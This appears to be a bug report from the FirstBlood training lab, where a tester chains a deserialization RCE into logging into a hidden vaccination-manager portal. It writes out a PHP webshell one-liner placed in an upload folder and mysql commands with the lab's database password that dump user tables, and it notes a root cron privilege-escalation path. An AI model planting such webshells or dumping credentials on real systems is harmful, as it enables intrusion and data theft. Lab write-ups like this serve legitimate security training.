FirstBlood-#771Finding and logging into the vaccination portal
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-28, twsec Level 2 reported:

after having an RCE through the deserialization bug, an attacker can wreck havoc on any machine, in our case i poked around and found a hidden login.php, portal.php for the vaccination manager.

now we enter the login.php but we're presented with the a login, so we need a username and a password and because we have an rce we poke more around untill we find several important files

the config.php.template, now we know the username, and the database name but we're short for the password since here it's just a variable so we poke more around specially in include folder

and we find the config.php file, now to connect to the mysql and extract the data, since we have RCE we could could create a reverse shell back to our server , or upload a webshell to the server both work,

an example of a webshell

after we have rce and connect back to our server we could write this script and create a web shell

echo "<?php echo system($_GET["cmd"]); ?>" > /app/firstblood/upload/cmdshell.php

we save it in upload folder since it has write access and then give the cmdshell.php an execution right, chmod +x chmdshell.php

and now navigate to firstblood.com/upload/cmdshell.php?cmd= and give it your commands,

benefits of having a webshell is that its on the server, and you dont have to worry about connectivity problems with your server.

back to our subject we need to login into the database and since we don't have interactive shell we need a one liner mysql command

some wrote the command :

mysql -u firstblood -p a5H0uQkkkM7SxvSOE4xhimg93qhcFk -D firstblood -e "show tables;"

it worked for them but not for me , i had to do the following

echo "show tables;" | mysql --database=firstblood --user=firstblood --password=a5H0uQkkkM7SxvSOE4xhimg93qhcFk echo "select from users;" | mysql --database=firstblood --user=firstblood --password=a5H0uQkkkM7SxvSOE4xhimg93qhcFk echo "select from vaccination_managers;" | mysql --database=firstblood --user=firstblood --password=a5H0uQkkkM7SxvSOE4xhimg93qhcFk

the password changes everytime so it might be different in my screenshots tables

users in users table

users in vaccination_managers

now we know the username and the password and we login into the vaccination portal

P1 CRITICAL

Endpoint: /vaccination-manager/login.php

Parameter: login.php

Payload: providing the username and password


FirstBlood ID: 35
Vulnerability Type: RCE

A cronjob is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the firstblood php pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.

Report Feedback

@zseano

Creator & Administrator


Hi twsec, this is technically still using the RCE bug to poke further. This wouldn't be something actually we advise doing on bug bounty programs and accessing sensitive information such as DB tables could result in you maybe getting in trouble. Be careful when testing on bb programs :) There is a way to access this portal without needing to use RCE to obtain the password. Great report though and great poc:)